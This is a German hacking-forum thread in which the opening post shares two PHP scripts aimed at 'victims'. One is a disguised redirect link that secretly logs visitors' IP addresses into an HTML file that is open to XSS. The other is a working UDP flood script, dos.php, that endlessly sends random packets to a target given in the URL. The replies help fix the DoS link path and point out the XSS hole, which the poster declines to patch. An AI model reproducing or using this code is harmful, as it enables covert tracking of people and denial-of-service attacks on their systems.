Ergebnis 1 bis 7 von 7
  1. #1
    Anfänger
    Registriert seit
    23.08.2008
    Beiträge
    6

    Standard Kleines PHP Script für euch

    So hab mich mal bissl nützlich gemacht und ein warscheinlich unnützes PHP Script geschrieben um die IP Adresse eines Victims rauszubekommen.

    Funktionsweise:

    Ihr gebt dem Victim eine Url per out.php?url=http://de.youtube.com/watch?v=qi_BX5cmreE über. Das Victim sieht nur diese Seite hier
    http://de.youtube.com/watch?v=qi_BX5cmreE. Im Hintergrund wurde die IP geloggt in "iplog/ip.html" .

    Wenn ihr die ip.html aufruft seht ihr die

    die Zeit des Logs
    das Datum des Logs
    die IP des Victims

    Außerdem sind gleich links generiert worden um eine

    dos-attacke über euren PHP Server auszuführen
    ein whois, trace oder scan durch Netcraft zu machen.

    Ich versichere euch das es nicht verseucht ist =)

    Entweder ihr ladet euch das script bei Rapidshare runter (ignoriert die "rs-punkt" Datei die ist nur da damit ich ein paar Punkte bei Rapidshare kriege um das Archiv zu vergrößern )

    Downloadlink: http://rapidshare.com/files/14140572...4free-hack.zip


    oder ihr benutzt den Code hier :

    out.php

    Code:
    <?php
    //logfile adresse
    $logfile = "iplog/ip.html";
    
    //IP
    $ip = $_SERVER['REMOTE_ADDR'];
    
    //Zeit 
    $zeit = date("H:i:s");
    
    //Datum
    $datum = date("d.m.Y");
    
    //IP Log
    $text = "Neue IP geloggt - [".$ip."] am [".$datum."] um [".$zeit."] Uhr | Weiterleitung f&uuml;hrte zu [url='".$_GET[url]."']".$_GET." | IP DOS | whois | Trace Netcraft Scan
    ";
    
    
    $fp = fopen($logfile, "a");
    
    fwrite($fp, $text);
    
    fclose($fp); 
    
    //Weiterleitung
    
    if($_GET[url]==NULL){
    
    		echo "Und wohin soll ich jetzt weiterleiten du Ei?";
    
    }else{
    
    		header("Location: ".$_GET[url]."");
    
    }
    
    
    ?>


    dos.php

    Code:
    <?php
    if (!$_GET['target'])
       die('Kein  Ziel angegeben!');
    
    $target = $_GET['target'];
    $sock = socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);
    
    if(!$sock)
      die(__LINE__);
    
    $data='';
    
    for ($i=0;$i<1400;$i++)
    {
      $data.=chr(rand(0,255));
    }
    
    while(true)
    {
      if (!socket_sendto($sock,$data,strlen($data),0,$target,9))
        die(__LINE__);
    $time = date("H:i:s");
    echo("$time | DOS läuft
    ");
    }
    ?>
    Hoffe konnte bissl helfen =)

  2. #2
    Linus Torvalds Avatar von kInGoFcHaOs
    Registriert seit
    25.11.2006
    Beiträge
    1.107

    Standard

    Neue IP geloggt - [yy.20xx7.xx.xx] am [31.08.2008] um [00:xx:57] Uhr | Weiterleitung führte zu http://xxx.xxx.xxx/xxx?x=xx_xxx| IP DOS | whois | Trace Netcraft Scan


    DOS führt auf iplog/dos.php was falsch ist ^^

    ausserdem wenn das wer rausfindet kann man die IP.html Cross side Scripten ^^

  3. #3
    Anfänger
    Registriert seit
    23.08.2008
    Beiträge
    6

    Standard

    IP DOS

    wo komm ich da in den "iplog" ordner?

    natürlich kann man dann xss ausführen aber da jetz noch nen schutz einzubauen wäre sinnlos da die meisten eh keine peilung haben =)

  4. #4
    Linus Torvalds Avatar von kInGoFcHaOs
    Registriert seit
    25.11.2006
    Beiträge
    1.107

    Standard

    ich werd auf jedenfall weitergeleitet auf iplog

    //edit
    du weist ned was ich meine!
    wenn ich bei der logfile(!!!) auf IP DOS gehe will er die dos.php im iplog ordner ausführen!

  5. #5
    we can make the world stop Avatar von maoshe
    Registriert seit
    13.06.2007
    Beiträge
    2.089

    Standard

    also statt
    IP DOS
    das hier:
    IP DOS

    oder die dos.php in den ordner kopieren
    (ง ͠° ͟ل͜ ͡°)ง
    Zitat Zitat von Southpark
    ICH FAPP GRAD MAN
    Zitat Zitat von Southpark
    mein SCHPERMA isch AGGRESSIV

  6. #6
    Anfänger
    Registriert seit
    23.08.2008
    Beiträge
    6

    Standard

    mhmm kp worans liegt hab die ordner struktur bissl für euch geändert da ich die beim meinen server bissl anders hab^^

  7. #7
    bomdidengdidengdigigi Avatar von hersch24
    Registriert seit
    09.12.2006
    Beiträge
    985

    Standard

    lol das kann man auch in 6 zeilen verwirklichen ...
    hallo

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •